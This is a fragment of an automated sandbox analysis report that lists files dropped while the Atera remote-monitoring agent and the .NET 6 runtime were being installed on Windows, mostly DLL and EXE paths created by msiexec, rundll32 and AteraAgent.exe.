                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\dotnet.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Brotli.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c999b.rbf (copy)Jump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28DE.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDDD3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A60.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8C1.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c9998.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Requests.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI66C4.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA259.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebProxy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Mail.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Metadata.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Text.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.DataSetExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD86.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.ILGeneration.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ObjectModel.dllJump to dropped file
